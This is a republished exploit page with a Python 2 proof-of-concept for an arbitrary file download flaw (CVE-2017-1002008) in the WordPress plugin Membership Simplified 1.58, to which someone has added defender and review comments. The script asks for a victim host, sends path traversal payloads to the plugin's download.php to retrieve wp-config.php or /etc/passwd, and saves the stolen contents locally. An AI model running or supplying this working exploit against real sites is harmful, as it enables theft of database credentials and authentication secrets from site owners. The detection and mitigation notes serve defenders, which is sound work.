Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download
来源:vfocus.net 作者:The Martian 发布时间:2017-03-20
# Proof-of-concept for the issue the banner below identifies as CVE-2017-1002008
# (CWE-23, relative path traversal) in the WordPress plugin
# "membership-simplified-for-oap-members-only" v1.58. It asks the plugin's
# download.php for a file outside the plugin directory through the
# `download_file` query parameter and stores the response body locally.
#
# Python 2 only: it uses print statements, raw_input() and the `urlparse` module.
#
# Defender notes:
#   * Detection: look in web-server access logs for GET requests to
#     /wp-content/plugins/membership-simplified-for-oap-members-only/download.php
#     whose `download_file` value contains `..././` (or `../`) sequences.
#   * Impact: wp-config.php normally holds the database credentials and the
#     authentication keys/salts. If such a request was answered with HTTP 200,
#     treat those secrets as disclosed and rotate them.
#   * Mitigation: this page names no fixed plugin version. Check the advisory URL
#     printed in the banner, and remove the plugin or block direct access to
#     download.php until a fix is confirmed.
import requests
import string
import random
from urlparse import urlparse

# Banner: credits, CVE/CWE identifiers and the advisory reference.
print "---------------------------------------------------------------------"
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
print "---------------------------------------------------------------------"

# Both values are read interactively and used unvalidated. `victim` is prepended
# to the request path as-is, so it must carry the scheme (see the prompt text).
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")

# Pick the traversal string for the chosen file.
# NOTE(review): `..././` becomes `../` when a filter strips `../` only once
# (non-recursively). Presumably that is the sanitisation the plugin applies;
# confirm against the advisory. A robust fix resolves the requested path and
# checks it stays inside an allowed directory rather than stripping substrings.
if file_choice == "1":
    # Three levels up from the plugin directory
    # (wp-content/plugins/<plugin>/), i.e. presumably the WordPress root.
    payload="..././..././..././wp-config.php"
elif file_choice == "2":
    # Enough levels to reach the filesystem root on typical layouts.
    payload="..././..././..././..././..././..././..././..././etc/passwd"
else:
    print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
    quit()

# The full request URL is built by plain string concatenation; the payload is
# not URL-encoded.
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
target=victim+slug


def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random string of `size` characters drawn from `chars`.

    Used only to give each local output file a distinct name. It relies on the
    non-cryptographic `random` module.
    """
    return ''.join(random.choice(chars) for _ in range(size))


def checkPlugin():
    """Request download.php without parameters and branch on the status code.

    HTTP 200 is taken to mean "seems vulnerable" and leads to exploit(). Any
    other status prints a message and exits. A 200 here only shows that the
    script is reachable, so it is a weak signal and does not confirm that the
    installed version is affected.
    """
    pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
    pluginExistence = pluginExists.status_code
    if pluginExistence == 200:
        print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
        exploit()
    else:
        print "Target has a funny code & might not be vulnerable, I will now exit\n"
        quit()


def exploit():
    """Fetch `target` and, on HTTP 200, write the response body to a local file.

    The output name is `<netloc>_config_<random>.txt` for choice "1" and
    `<netloc>_passwd<random>.txt` otherwise, where `<netloc>` is the network
    location parsed from `victim`. The body is written as received; nothing
    checks that it is actually the requested file.
    """
    getThatFile = requests.get(target)
    fileState = getThatFile.status_code
    # Host part of the entered URL, used as the output filename prefix.
    breakApart=urlparse(victim)
    extract_hostname=breakApart.netloc
    randomDifferentiator=randomizeFile()
    cleanName=str(randomDifferentiator)
    if fileState == 200:
        respFromThatFile = getThatFile.text
        if file_choice == "1":
            resultFile=extract_hostname+"_config_"+cleanName+".txt"
            print resultFile
            pwned=open(resultFile, 'w')
            pwned.write(respFromThatFile)
            # NOTE(review): `pwned.close` lacks parentheses, so close() is never
            # called and the handle is not explicitly closed here.
            pwned.close
            print "Wordpress Config Written to "+resultFile
        else:
            resultFile=extract_hostname+"_passwd"+cleanName+".txt"
            pwned=open(resultFile, 'w')
            pwned.write(respFromThatFile)
            # NOTE(review): same missing call parentheses as in the branch above.
            pwned.close
            print "Passwd File Written to "+resultFile
    else:
        # NOTE(review): `fileState` is the integer status code, so this str + int
        # concatenation raises TypeError instead of printing the message.
        print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState


if __name__ == "__main__":
    checkPlugin()